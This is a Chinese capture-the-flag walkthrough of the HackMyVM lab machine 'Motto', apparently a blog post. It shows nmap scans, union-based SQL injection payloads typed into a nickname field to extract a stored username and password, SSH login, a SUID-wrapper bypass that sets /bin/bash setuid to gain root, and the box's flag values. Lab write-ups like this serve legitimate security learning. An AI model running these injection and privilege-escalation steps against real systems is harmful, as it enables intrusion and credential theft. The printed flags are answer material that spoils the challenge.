Motto

靶机说明

一、信息收集

1、主机探测

该靶机的IP地址是固定的,无法使用nmap进行探测,打开靶机显示IP地址为192.168.2.9

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.9                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 11:24 CST
Nmap scan report for 192.168.2.9
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds

开放端口:22、80、9090

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,9090 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 11:27 CST
Nmap scan report for 192.168.2.9
Host is up (0.0015s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http        Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x82\xB9\xE5\x87\xBB\xE6\x96\xB9\xE5\x9D\x97\xE5\xB0\x8F\xE6\xB8\xB8\xE6\x88\x8F
|_http-server-header: Apache/2.4.62 (Debian)
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GenericLines, SqueezeCenter_CLI: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Date: Thu, 04 Sep 2025 03:28:00 GMT
|     <!DOCTYPE html>
|     <html lang="zh-CN">
|     <head>
|     <meta charset="UTF-8" />
|     <title>Mottos</title>
|     <link rel="stylesheet" href="/static/css/index.css" />
|     <style>
|     .top-right-auth {
|     position: fixed;
|     top: 20px;
|     right: 30px;
|     font-size: 14px;
|     font-family: Arial, sans-serif;
|     z-index: 1000;
|     .top-right-auth a, .top-right-auth button {
|     color: #2980b9;
|     text-decoration: none;
|     margin-left: 10px;
|     font-weight: 600;
|     border: 1.5px solid #2980b9;
|     padding: 6px 14px;
|     border-radius: 20px;
|     background: none;
|     cursor: pointer;
|_    transition: background-color 0.3s,
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.01 seconds

3.UDP端口扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 14:38 CST
Nmap scan report for 192.168.2.9
Host is up (0.00062s latency).
All 100 scanned ports on 192.168.2.9 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.18 seconds

没有开放的udp端口

4.漏洞脚本扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,9090 192.168.2.9              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 14:21 CST
Nmap scan report for 192.168.2.9
Host is up (0.00033s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
9090/tcp open  zeus-admin
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.53 seconds

没有其他有用的信息

二、WEB渗透

1、80端口-Apache服务

访问80端口服务,发现是一个游戏页面,查看源码和目录扫描没有找到有用的信息

2、9090端口

访问9090端口,是一个留言板,尝试写入留言,提示需要进行登录

跳转到登录页面,进行注册后登录

写一个Motto,然后查看我的Motto就会显示出写的Motto

修改昵称为sunset后查看Motto,发现会显示sunset的Motto

修改昵称为sunset'后,发现无回显
再次将昵称修改为sunset' -- a后,又能成功回显
故判断此处存在sql注入

三、漏洞利用

1、SQL注入-union联合注入

1.查看回显的列

1
sunset' order by 3 -- a

能成功进行回显

2.查看所有的数据库

1
sunset' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a

成功回显,同时在第三列存在回显

3.查看数据库下面存在的表名

1
sunset' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- a

回显出两个表名

4.查看register_infos的字段

1
sunset' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='register_infos'-- a

找到相关的字段名

5.查看表中的username、password

1
sunset' union select 1,username,password from register_infos; -- a

回显出数据

得到用户RedBean以及密码cannotforgetyou

四、获取redbean权限

直接ssh连接,需要注意用户为小写redbean

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/tmp]
└─# ssh redbean@192.168.2.9
redbean@192.168.2.9's password: 
Linux motto 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 31 04:01:36 2025 from 192.168.56.103
redbean@motto:~$ id
uid=1000(redbean) gid=1000(redbean) groups=1000(redbean)

五、权限提升

查看sudo属性,发现需要密码

1
2
3
4
5
6
7
8
9
10
11
redbean@motto:~$ sudo -l
sudo: unable to resolve host motto: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for redbean:

查看具有suid权限的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
redbean@motto:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/run_newsh

找到一个/opt/run_newsh,使用strings进行查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
redbean@motto:/opt$ strings run_newsh 
/lib64/ld-linux-x86-64.so.2
setuid
execv
perror
stderr
fprintf
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Usage: %s <arg>
/opt/new.sh
execv failed
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
run_newsh.c
...

发现他执行/opt/new.sh文件
查看/opt/new.sh文件,发现没有权限进行编辑

全局搜索new.sh

1
2
3
redbean@motto:/opt$ find / -name new.sh 2>/dev/null
/home/redbean/.backup/new.sh
/opt/new.sh

/home/redbean/.backup目录下面,找到了new.shrun_newsh.c源码

new.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
redbean@motto:~/.backup$ cat new.sh 
#!/bin/bash
PATH=/usr/bin

echo -e "\033[1;35m"
echo '▓▒░ Loading system diagnostics ░▒▓'
echo -e "\033[0m"

echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:"
for step in A B C; do
    echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m"
    sleep 0.12
done

echo "Random seed value: $RANDOM"
echo -e "\033[1;34m[INFO]\033[0m Evaluating input parameters..."
sleep 0.15

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash 

echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:"
for step in {1..3}; do
    echo -e "\033[1;35m → Executing test ${step} of 3\033[0m"
    sleep 0.2
done

WAIT_TIME=$((RANDOM%5+2))
echo -e "\033[1;36m\nWaiting period: \033[3${WAIT_TIME}m${WAIT_TIME} seconds\033[0m"

for ((i=WAIT_TIME; i>=0; i--)); do
    case $((i%4)) in
        0) COL="34" ;; # 蓝
        1) COL="32" ;; # 绿
        2) COL="31" ;; # 红
        3) COL="36" ;; # 青
    esac

    case $((i%2)) in
        0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;;
        1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;;
    esac

    [ $i -gt 0 ] && sleep 1
done

RESULTS=(
    "Diagnostics complete."
    "All systems nominal."
    "No errors detected."
    "System stable."
)

FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]}
echo -e "\033[1;32m${FINAL_MSG}\033[0m"
echo -e "\033[1;34mThank you for using the system monitor.\033[0m"

echo -e "\033[1;30m[STATS] Summary Report:\033[0m"
echo -e "    Processes checked: $((RANDOM%60+20))"
echo -e "    CPU load average: $(echo "scale=2; $RANDOM%10+0.5" | bc)"
echo -e "    Uptime (hours): $((RANDOM%100+1))"

run_newsh.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
redbean@motto:~/.backup$ cat run_newsh.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <arg>\n", argv[0]);
        return 1;
    }

    // 切换为 root 权限(如果以 setuid 运行)
    setuid(0);
    setgid(0);

    // 构造参数,调用 ./new.sh 参数
    char *script = "/opt/new.sh";
    char *args[] = { script, argv[1], NULL };

    execv(script, args);  // 用 execv 调用脚本

    perror("execv failed");
    return 1;
}

new.sh中,存在漏洞,第三个条件没有转换成字符串加个空格就能绕过

1
2
3
[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

执行脚本,使/bin/bash具有suid权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
redbean@motto:~/.backup$  /opt/run_newsh 'flag '

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
 ● Module A status: OK (ver 4.17.190)
 ● Module B status: OK (ver 2.4.482)
 ● Module C status: OK (ver 2.5.116)
Random seed value: 26001
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
 → Executing test 1 of 3
 → Executing test 2 of 3
 → Executing test 3 of 3

Waiting period: 3 seconds
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
No errors detected.
Thank you for using the system monitor.
[STATS] Summary Report:
    Processes checked: 74
/opt/new.sh: line 60: bc: command not found
    CPU load average: 
    Uptime (hours): 31

查看/bin/bash属性,已经具有suid权限

1
2
redbean@motto:~/.backup$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

获取root权限

1
2
3
4
5
redbean@motto:~/.backup$ /bin/bash -p
bash-5.0# id
uid=1000(redbean) gid=1000(redbean) euid=0(root) egid=0(root) groups=0(root),1000(redbean)
bash-5.0# whoami
root

六、获取FLAG

1
bash-5.0# cat /home/redbean/user.txt /root/root.txt flag{796f756765747265646265616e} flag{796f75676574726f6f74627574796f7563616e6e6f74676574686572}
Hackmyvm
#提权-suid #SQL注入
Motto
http://miao-sec.github.io/Hackmyvm/Motto/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO